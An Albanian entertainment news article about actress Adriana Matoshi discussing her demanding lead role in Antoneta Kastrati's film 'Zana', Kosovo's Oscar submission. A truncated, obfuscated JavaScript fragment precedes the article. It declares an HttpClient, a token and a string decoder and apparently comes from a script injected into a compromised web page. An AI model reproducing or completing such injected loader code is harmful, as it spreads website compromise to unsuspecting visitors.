;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Adriana Matoshi flet për vështirësitë e rolit të saj në filmin ‘Zana’

By

Filmi “Zana “ me regji të Antoneta Kastratit është një ndër të paktë filma që te jep ndjenja krenarie e drithërimi në të njëjtën kohë.

Në fillim të muajit shtator ishte bërë e ditur se filmi “Zana” me regji të Antoneta Kastratit ishte caktuar të jetë përfaqësues i Kosovës në kategorinë “Best International Feature” për çmimin Oscar.

Filmi i cili shpalos traumat e pasluftës dhe pasojat më të cilat ballafaqohen shumë prej grave në Kosovë, gjithashtu kishte thyer rekorde duke u renditur e para në shitjen e biletave në kinemanë Cineplexx.

E ftuar për Prive, aktorja e njohur shqiptare Adriana Matoshi foli më detajisht për rolin e saj protagonist në këtë film.

Duke qenë se filmi është i bazuar në një ngjarje të vërtet, dhe ishte ngjarja e dy shoqeve të aktores, i rëndoi edhe më shumë barrën që do mbarte ky rol për të.

“Unë e kam dhënë shpirtin, ndoshta pse ngjarja ishte e dy shoqeve të mia më ka bërë që të koncentrohem më shumë dhe të tregoj veten në atë hapësirë të madhe që e kam pasur. Është e lehtë të luash një rol kur i ke pesë a gjashtë skena dhe është shumë më e vështirë kur je pjesë e çdo skene me barrën e rolit kryesor dhe jë në të gjitha skenat aq të rënda emocionale” – tha Matoshi në intervistën e saj për Prive.

Më poshtë mund të ndiqni intervistën e saj të plotë për Prive:

Filmi ZANA është një portret shkatërrues i traumës së pasluftës. Është përhumbëse dhe e qetë, me një ndjenjë të frikës së përgjumur në çdo cep.

E vendosur në një fshat të vogël në Kosovë, ZANA eksploron amësinë, pikëllimin dhe mistikën. Lume (Adriana Matoshi) është një guaskë e një gruaje që vajton për një humbje të dhunshme, të pashpjegueshme me të cilën të tjerët duket se janë pajtuar.

Mund ta ndiqni triler-in më poshtë:

Filmi i ri kosovar “Zana”, personazhin e të cilit e portretizon aktorja kosovare Adriana Matoshi mbajti premierën në Toronto, gjë e cila ndodhi për herë të parë në kinematografinë shqiptare. /Prive.al

 

 

 

Artikuj të ngjashëm